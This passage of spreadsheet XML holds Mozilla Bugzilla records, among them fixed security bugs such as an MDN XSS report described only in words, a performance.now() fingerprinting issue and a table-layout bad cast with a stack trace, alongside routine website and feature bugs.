      <c r="F5320" t="n">
        <v>1</v>
      </c>
      <c r="G5320" t="n">
        <v>5</v>
      </c>
      <c r="H5320" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5320" t="inlineStr">
        <is>
          <t>developer.mozilla.org</t>
        </is>
      </c>
      <c r="J5320" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K5320" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5320" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5320" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5320" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5320" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5320" t="inlineStr"/>
      <c r="Q5320" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5320" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5320" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5320" t="n">
        <v>1</v>
      </c>
      <c r="U5320" t="n">
        <v>0</v>
      </c>
      <c r="V5320" t="n">
        <v>19</v>
      </c>
      <c r="W5320" t="inlineStr">
        <is>
          <t>Created attachment 8588645
POC video
We've received the following email:
From: Mohamed Khaled &lt;sirmatrixpage@gmail.com&gt;
Date: Fri, Apr 3, 2015 at 10:36 PM
Subject: Security Report
To: security@mozilla.org
Hello Mozilla Team , 
My Name Is Mohamed Khaled [ security researcher ] From Egypt 
Type : Cross Site Scripting 
About XSS : https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
POC : 
1 - Go To [ https://developer.mozilla.org/en-US/docs/ ] 
2 - Create New Topic 
3 - Add Iframe Xss Code In Source In Editor 
4 - Preview Your Code [ XSS Code Pop-up ] Show 
In Mail - POC Video</t>
        </is>
      </c>
      <c r="X5320" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5321">
      <c r="A5321" t="n">
        <v>1153672</v>
      </c>
      <c r="B5321" t="inlineStr">
        <is>
          <t>2015-04-12 13:45:15 -0700</t>
        </is>
      </c>
      <c r="C5321" t="inlineStr">
        <is>
          <t>Fingerprinting individuals via performance.now()</t>
        </is>
      </c>
      <c r="D5321" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E5321" t="n">
        <v>1</v>
      </c>
      <c r="F5321" t="n">
        <v>1</v>
      </c>
      <c r="G5321" t="n">
        <v>3</v>
      </c>
      <c r="H5321" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5321" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5321" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5321" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5321" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5321" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5321" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5321" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5321" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main41+][fingerprinting]</t>
        </is>
      </c>
      <c r="Q5321" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5321" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5321" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T5321" t="n">
        <v>1</v>
      </c>
      <c r="U5321" t="n">
        <v>0</v>
      </c>
      <c r="V5321" t="n">
        <v>40</v>
      </c>
      <c r="W5321" t="inlineStr">
        <is>
          <t>Created attachment 8591392
Multiple Browsers Performance object leaks the Windows performance counter frequency
Amit Klein is working on research that shows it's possible to extract the Windows counter frequency using the Windows.performance.now() high-resolution timer, and that this value is consistent between Firefox and IE. He doesn't mention Chrome which also supports this now-standard feature (http://www.w3.org/TR/hr-time) so it's unclear if the technique doesn't work on Chrome or if he simply didn't test it.
Amit is able to detect two families of VM by their characteristic frequency, and between two machines of the same nominal clock speed there can be a detectable and consistent skew that raises fingerprinting worries.
He has also reported this to Microsoft and we should coordinate any disclosures through Amit to make sure everyone's on the same page.</t>
        </is>
      </c>
      <c r="X5321" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5322">
      <c r="A5322" t="n">
        <v>470446</v>
      </c>
      <c r="B5322" t="inlineStr">
        <is>
          <t>2008-12-19 10:18:57 -0800</t>
        </is>
      </c>
      <c r="C5322" t="inlineStr">
        <is>
          <t>Creating an event should not require get started fields</t>
        </is>
      </c>
      <c r="D5322" t="inlineStr">
        <is>
          <t>2009-07-15 21:18:51 -0700</t>
        </is>
      </c>
      <c r="E5322" t="n">
        <v>1</v>
      </c>
      <c r="F5322" t="n">
        <v>1</v>
      </c>
      <c r="G5322" t="n">
        <v>5</v>
      </c>
      <c r="H5322" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5322" t="inlineStr">
        <is>
          <t>quality.mozilla.org</t>
        </is>
      </c>
      <c r="J5322" t="inlineStr">
        <is>
          <t>Website</t>
        </is>
      </c>
      <c r="K5322" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5322" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5322" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5322" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5322" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5322" t="inlineStr"/>
      <c r="Q5322" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5322" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5322" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5322" t="n">
        <v>1</v>
      </c>
      <c r="U5322" t="n">
        <v>0</v>
      </c>
      <c r="V5322" t="n">
        <v>4</v>
      </c>
      <c r="W5322" t="inlineStr">
        <is>
          <t>can we remove the required fields when creating a new event?   I just wanted to make a calendar item milestone.
    * How to Get Started field is required.
    * Getting Started E-mail field is required.</t>
        </is>
      </c>
      <c r="X5322" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5323">
      <c r="A5323" t="n">
        <v>1355636</v>
      </c>
      <c r="B5323" t="inlineStr">
        <is>
          <t>2017-04-11 15:38:23 -0700</t>
        </is>
      </c>
      <c r="C5323" t="inlineStr">
        <is>
          <t>Create Deeplinks for MMA</t>
        </is>
      </c>
      <c r="D5323" t="inlineStr">
        <is>
          <t>2017-06-22 10:58:05 -0700</t>
        </is>
      </c>
      <c r="E5323" t="n">
        <v>1</v>
      </c>
      <c r="F5323" t="n">
        <v>1</v>
      </c>
      <c r="G5323" t="n">
        <v>2</v>
      </c>
      <c r="H5323" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5323" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J5323" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5323" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5323" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M5323" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N5323" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5323" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5323" t="inlineStr">
        <is>
          <t>[mma] [MobileCore][b4]</t>
        </is>
      </c>
      <c r="Q5323" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5323" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5323" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5323" t="n">
        <v>1</v>
      </c>
      <c r="U5323" t="n">
        <v>0</v>
      </c>
      <c r="V5323" t="n">
        <v>12</v>
      </c>
      <c r="W5323" t="inlineStr">
        <is>
          <t>Marketing has requested the following deep links. We probably need clarification on some.
Link to Sync settings
Link to default mail app settings
Link to default search engine settings
Link bookmark area
Link into New Tabs settings
Link into Homepage settings
Link to Private Data settings
Link to New Private Tab (or a way to highlight/bubble new private tab mask?)
Sign up for a newsletter (can we get users to sign up on slide instead of pointing them to a landing page?)</t>
        </is>
      </c>
      <c r="X5323" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5324">
      <c r="A5324" t="n">
        <v>759249</v>
      </c>
      <c r="B5324" t="inlineStr">
        <is>
          <t>2012-05-28 23:28:57 -0700</t>
        </is>
      </c>
      <c r="C5324" t="inlineStr">
        <is>
          <t>Bad cast in nsTableFrame::InsertFrames</t>
        </is>
      </c>
      <c r="D5324" t="inlineStr">
        <is>
          <t>2024-05-29 16:01:25 -0700</t>
        </is>
      </c>
      <c r="E5324" t="n">
        <v>1</v>
      </c>
      <c r="F5324" t="n">
        <v>1</v>
      </c>
      <c r="G5324" t="n">
        <v>3</v>
      </c>
      <c r="H5324" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5324" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5324" t="inlineStr">
        <is>
          <t>Layout: Tables</t>
        </is>
      </c>
      <c r="K5324" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5324" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5324" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5324" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5324" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5324" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q5324" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5324" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5324" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T5324" t="n">
        <v>1</v>
      </c>
      <c r="U5324" t="n">
        <v>0</v>
      </c>
      <c r="V5324" t="n">
        <v>25</v>
      </c>
      <c r="W5324" t="inlineStr">
        <is>
          <t>Created attachment 627858
Testcase
Reproduces on Firefox trunk
20120528230131
http://hg.mozilla.org/mozilla-central/rev/79262a88881d
First it hits the asserts here.
NS_IMETHODIMP
nsTableFrame::InsertFrames(ChildListID     aListID,
                           nsIFrame*       aPrevFrame,
                           nsFrameList&amp;    aFrameList)
{
........
#ifdef DEBUG
  // verify that all sibling have the same type, if they do not, expect cellmap issues
  for (nsFrameList::Enumerator e(aFrameList); !e.AtEnd(); e.Next()) {
    const nsStyleDisplay* nextDisplay = e.get()-&gt;GetStyleDisplay();
    NS_ASSERTION((display-&gt;mDisplay == NS_STYLE_DISPLAY_TABLE_COLUMN_GROUP) ==
        (nextDisplay-&gt;mDisplay == NS_STYLE_DISPLAY_TABLE_COLUMN_GROUP),
      "heterogenous childlist");
  }
#endif
Bad cast happens here. We get a nsTableRowGroupFrame, which gets incorrectly casted to nsTableColGroupFrame.
void nsTableFrame::InsertColGroups(PRInt32                   aStartColIndex,
                                   const nsFrameList::Slice&amp; aColGroups)
{
  PRInt32 colIndex = aStartColIndex;
  nsFrameList::Enumerator colGroups(aColGroups);
  for (; !colGroups.AtEnd(); colGroups.Next()) {
    nsTableColGroupFrame* cgFrame =
      static_cast&lt;nsTableColGroupFrame*&gt;(colGroups.get());
&gt;	xul.dll!nsTableFrame::InsertColGroups(int aStartColIndex=0, const nsFrameList::Slice &amp; aColGroups={...})  Line 546 + 0x10 bytes	C++
 	xul.dll!nsTableFrame::InsertFrames(mozilla::layout::FrameChildListID aListID=kPrincipalList, nsIFrame * aPrevFrame=0x00000000, nsFrameList &amp; aFrameList={...})  Line 2240 + 0x10 bytes	C++
 	xul.dll!nsFrameManager::InsertFrames(nsIFrame * aParentFrame=0x059edd90, mozilla::layout::FrameChildListID aListID=kPrincipalList, nsIFrame * aPrevFrame=0x00000000, nsFrameList &amp; aFrameList={...})  Line 500	C++
 	xul.dll!nsCSSFrameConstructor::AppendFramesToParent(nsFrameConstructorState &amp; aState={...}, nsIFrame * aParentFrame=0x059edd90, nsFrameItems &amp; aFrameList={...}, nsIFrame * aPrevSibling=0x00000000, bool aIsRecursiveCall=false)  Line 5728	C++
 	xul.dll!nsCSSFrameConstructor::ContentAppended(nsIContent * aContainer=0x059eff88, nsIContent * aFirstNewContent=0x050baec0, bool aAllowLazyConstruction=true)  Line 6660	C++
 	xul.dll!PresShell::ContentAppended(nsIDocument * aDocument=0x08218b70, nsIContent * aContainer=0x059eff88, nsIContent * aFirstNewContent=0x050baec0, int aNewIndexInContainer=1)  Line 4170	C++
 	xul.dll!nsNodeUtils::ContentAppended(nsIContent * aContainer=0x059eff88, nsIContent * aFirstNewContent=0x050baec0, int aNewIndexInContainer=1)  Line 148 + 0xce bytes	C++
 	xul.dll!nsHtml5PendingNotification::Fire()  Line 61 + 0x2b bytes	C++
 	xul.dll!nsHtml5TreeOpExecutor::FlushPendingAppendNotifications()  Line 324	C++
 	xul.dll!nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor * aBuilder=0x08219ab8, nsIContent * * aScriptElement=0x0014ce48)  Line 517	C++
 	xul.dll!nsHtml5TreeOpExecutor::RunFlushLoop()  Line 530	C++
 	xul.dll!nsHtml5ExecutorReflusher::Run()  Line 96	C++
 	xul.dll!nsThread::ProcessNextEvent(bool mayWait=false, bool * result=0x0014ceff)  Line 657 + 0x19 bytes	C++
 	xul.dll!NS_ProcessNextEvent_P(nsIThread * thread=0x008a9e38, bool mayWait=false)  Line 245 + 0x17 bytes	C++
 	xul.dll!mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate * aDelegate=0x008a69a8)  Line 110 + 0xe bytes	C++
 	xul.dll!MessageLoop::RunInternal()  Line 209	C++
 	xul.dll!MessageLoop::RunHandler()  Line 202	C++
 	xul.dll!MessageLoop::Run()  Line 176	C++
 	xul.dll!nsBaseAppShell::Run()  Line 191	C++
 	xul.dll!nsAppShell::Run()  Line 252 + 0x9 bytes	C++
 	xul.dll!nsAppStartup::Run()  Line 295 + 0x1c bytes	C++
 	xul.dll!XRE_main(int argc=1, char * * argv=0x00188010, const nsXREAppData * aAppData=0x012fb844)  Line 3703 + 0x25 bytes	C++
 	firefox.exe!do_main(int argc=1, char * * argv=0x00188010)  Line 190 + 0x13 bytes	C++
 	firefox.exe!NS_internal_main(int argc=1, char * * argv=0x00188010)  Line 277 + 0xd bytes	C++
 	firefox.exe!wmain(int argc=1, wchar_t * * argv=0x00181b90)  Line 107 + 0xd bytes	C++
 	firefox.exe!__tmainCRTStartup()  Line 583 + 0x19 bytes	C
 	firefox.exe!wmainCRTStartup()  Line 403	C</t>
        </is>
      </c>
      <c r="X5324" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5325">
      <c r="A5325" t="n">
        <v>1202280</v>
      </c>
      <c r="B5325" t="inlineStr">
        <is>
          <t>2015-09-06 13:13:14 -0700</t>
        </is>
      </c>
      <c r="C5325" t="inlineStr">
        <is>
          <t>[Control Center] Style the security subview's More Information button like a footer</t>
        </is>
      </c>
      <c r="D5325" t="inlineStr">
        <is>
          <t>2016-08-25 05:49:34 -0700</t>
        </is>
      </c>
      <c r="E5325" t="n">
        <v>1</v>
      </c>
      <c r="F5325" t="n">
        <v>1</v>
      </c>
      <c r="G5325" t="n">
        <v>2</v>
      </c>
      <c r="H5325" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5325" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5325" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K5325" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5325" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5325" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5325" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5325" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5325" t="inlineStr">
        <is>
          <t>[fxprivacy]</t>
        </is>
      </c>
      <c r="Q5325" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5325" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5325" t="inlineStr">
        <is>
          <t>Firefox 47</t>
        </is>
      </c>
      <c r="T5325" t="n">
        <v>1</v>
      </c>
      <c r="U5325" t="n">
        <v>1</v>
      </c>
      <c r="V5325" t="n">
        <v>20</v>
      </c>
      <c r="W5325" t="inlineStr">
        <is>
          <t>As per bug 1196053 comment 31</t>
        </is>
      </c>
      <c r="X5325" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5326">
      <c r="A5326" t="n">
        <v>223320</v>
      </c>
      <c r="B5326" t="inlineStr">
        <is>
          <t>2003-10-22 18:50:00 -0700</t>
        </is>
      </c>
      <c r="C5326" t="inlineStr">
        <is>
          <t>increasing number of users can't find macOS 9 builds / download... [Mac OS 9]</t>
        </is>
      </c>
      <c r="D5326" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E5326" t="n">
        <v>1</v>
      </c>
      <c r="F5326" t="n">
        <v>1</v>
      </c>
      <c r="G5326" t="n">
        <v>5</v>
      </c>
      <c r="H5326" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5326" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J5326" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5326" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5326" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5326" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5326" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5326" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5326" t="inlineStr"/>
      <c r="Q5326" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5326" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5326" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5326" t="n">
        <v>1</v>
      </c>
      <c r="U5326" t="n">
        <v>0</v>
      </c>
      <c r="V5326" t="n">
        <v>15</v>
      </c>
      <c r="W5326" t="inlineStr">
        <is>
          <t>webmaster and suggestions mail is increasing on the topic of inability for users
to find builds for OS9.x.   neet to raise the visiability of the last OS9 build at:
 ftp://ftp.mozilla.org/pub/mozilla.org/mozilla/releases/mozilla1.2.1/mozilla-macos9-1.2.1-full.bin
The feedback looks a lot like this set of messages that arrived in the last few
hours....
This is not a suggestion ..... This is a problem!!!!!!!
What happened to MacOS 9 builds????
There are still millions of us out there [mostly graphics professionals] who don't
think that MacOS X is mature enough to switch to yet. 
Dear Webmaster,
I have noticed your browser on other computers which were PC. I was looking on a
download website and only found downloads for OS/2 and OSX for the MAC. I have
OS9.0. Do I use OS/2 or is there one for OS9.0?  Is there a cost for using on a
MAC computer?
Any information you can provide would be helpful.
Thank you for your time.
Sincerely,
Mark Vidler
Marketing Coordinator
I wonder if there is a mozilla version that runs on a Mac that has not yet
OSX?
I can not find any hint on your home page and I tried in vane to look for it
in the search mask.
Barbara Truog 
_________________________</t>
        </is>
      </c>
      <c r="X5326" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5327">
      <c r="A5327" t="n">
        <v>1196237</v>
      </c>
      <c r="B5327" t="inlineStr">
        <is>
          <t>2015-08-19 06:17:22 -0700</t>
        </is>
      </c>
      <c r="C5327" t="inlineStr">
        <is>
          <t>nsHostResolver thread is still running late in shutdown</t>
        </is>
      </c>
      <c r="D5327" t="inlineStr">
        <is>
          <t>2016-07-02 11:08:42 -0700</t>
        </is>
      </c>
      <c r="E5327" t="n">
        <v>1</v>
      </c>
      <c r="F5327" t="n">
        <v>1</v>
      </c>
      <c r="G5327" t="n">
        <v>3</v>
      </c>
      <c r="H5327" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5327" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5327" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K5327" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5327" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5327" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5327" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5327" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5327" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main42+]</t>
        </is>
      </c>
      <c r="Q5327" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5327" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5327" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T5327" t="n">
        <v>1</v>
      </c>
      <c r="U5327" t="n">
        <v>0</v>
      </c>
      <c r="V5327" t="n">
        <v>20</v>
      </c>
      <c r="W5327" t="inlineStr">
        <is>
          <t>This is per bug 1193038, comment 0 and bug 1193038, comment 6 ff.
(In reply to Randell Jesup [:jesup] from comment #0)
&gt; Repeated crashes in the field with 0x5a signatures.  
&gt; Called from
&gt; Telemetry::Accumulate(Telemetry::DNS_FAILED_LOOKUP_TIME, millis);
&gt; 
&gt; https://crash-stats.mozilla.com/report/index/aabb2399-64d7-4ec7-a888-
&gt; 027b02150805
The follow-up comments there make it pretty clear that nsHostResolver is still running late (after the backing Telemetry storage is already cleared out).
&gt; Others include 
&gt; Telemetry::Accumulate(Telemetry::STS_NUMBER_OF_ONSOCKETREADY_CALLS,
&gt; numberOfOnSocketReadyCalls)
&gt; (https://crash-stats.mozilla.com/report/index/c77f5b7c-cc39-44d3-9664-
&gt; 030ff2150807)
Per that nsSocketTransportService might have a similar issue.</t>
        </is>
      </c>
      <c r="X5327" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5328">
      <c r="A5328" t="n">
        <v>626262</v>
      </c>
      <c r="B5328" t="inlineStr">
        <is>
          <t>2011-01-16 13:54:37 -0800</t>
        </is>
      </c>
      <c r="C5328" t="inlineStr">
        <is>
          <t>"ASSERTION: ownerDocument changed again after adopting!" with mutation event</t>
        </is>
      </c>
      <c r="D5328" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E5328" t="n">
        <v>1</v>
      </c>
      <c r="F5328" t="n">
        <v>1</v>
      </c>
      <c r="G5328" t="n">
        <v>3</v>
      </c>
      <c r="H5328" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5328" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5328" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5328" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5328" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5328" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5328" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5328" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5328" t="inlineStr">
        <is>
          <t>[sg:high?] [qa-examined-192]</t>
        </is>
      </c>
      <c r="Q5328" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5328" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5328" t="inlineStr">
        <is>
          <t>mozilla5</t>
        </is>
      </c>
      <c r="T5328" t="n">
        <v>1</v>
      </c>
      <c r="U5328" t="n">
        <v>0</v>
      </c>
      <c r="V5328" t="n">
        <v>14</v>
      </c>
      <c r="W5328" t="inlineStr">
        <is>
          <t>Created attachment 504299
testcase
###!!! ASSERTION: ownerDocument changed again after adopting!: 'HasSameOwnerDoc(newContent) &amp;&amp; doc == GetOwnerDoc()', file content/base/src/nsGenericElement.cpp, line 4066</t>
        </is>
      </c>
      <c r="X5328" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5329">
      <c r="A5329" t="n">
        <v>1677046</v>
      </c>
      <c r="B5329" t="inlineStr">
        <is>
          <t>2020-11-13 00:46:45 -0800</t>
        </is>
      </c>
      <c r="C5329" t="inlineStr">
        <is>
          <t>Apply existing outgoing port restrictions from Necko to WebRTC code</t>
        </is>
      </c>
      <c r="D5329" t="inlineStr">
        <is>
          <t>2021-11-22 23:34:17 -0800</t>
        </is>
      </c>
      <c r="E5329" t="n">
        <v>1</v>
      </c>
      <c r="F5329" t="n">
        <v>1</v>
      </c>
      <c r="G5329" t="n">
        <v>3</v>
      </c>
      <c r="H5329" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5329" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5329" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K5329" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5329" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5329" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5329" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5329" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5329" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main87+][adv-esr78.9+]</t>
        </is>
      </c>
      <c r="Q5329" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5329" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S5329" t="inlineStr">
        <is>
          <t>87 Branch</t>
        </is>
      </c>
      <c r="T5329" t="n">
        <v>1</v>
      </c>
      <c r="U5329" t="n">
        <v>0</v>
      </c>
      <c r="V5329" t="n">
        <v>21</v>
      </c>
      <c r="W5329" t="inlineStr">
        <is>
          <t>This is related to bug 1676868 (and bug 1674735).
We need to find out how to make TURN servers provided for WebRTC / ICE are also subject to existing port restriction for outbound connections.
CCing Nils: Can you please assign someone to ensure that we can apply these restrictions from [Necko's port block list](https://searchfox.org/mozilla-central/rev/7b07725fe9dc5d59a525990fc1dba78bc8b82af1/netwerk/base/nsIOService.cpp#104) into our WebRTC code (e.g., at https://hg.mozilla.org/mozilla-central/file/abe51ad662bc6efbe8c637c75cd2630788d49446/dom/media/webrtc/jsapi/MediaTransportHandler.cpp#l285)</t>
        </is>
      </c>
      <c r="X5329" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5330">
      <c r="A5330" t="n">
        <v>815795</v>
      </c>
      <c r="B5330" t="inlineStr">
        <is>
          <t>2012-11-27 13:47:00 -0800</t>
        </is>
      </c>
      <c r="C5330" t="inlineStr">
        <is>
          <t>stack buffer overflow with canvas</t>
        </is>
      </c>
      <c r="D5330" t="inlineStr">
        <is>
          <t>2024-05-30 07:52:12 -0700</t>
        </is>
      </c>
      <c r="E5330" t="n">
        <v>1</v>
      </c>
      <c r="F5330" t="n">
        <v>1</v>
      </c>
      <c r="G5330" t="n">
        <v>3</v>
      </c>
      <c r="H5330" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5330" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5330" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K5330" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5330" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5330" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5330" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5330" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5330" t="inlineStr">
        <is>
          <t>[asan][adv-main18+][adv-esr17+]</t>
        </is>
      </c>
      <c r="Q5330" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5330" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5330" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T5330" t="n">
        <v>1</v>
      </c>
      <c r="U5330" t="n">
        <v>0</v>
      </c>
      <c r="V5330" t="n">
        <v>28</v>
      </c>
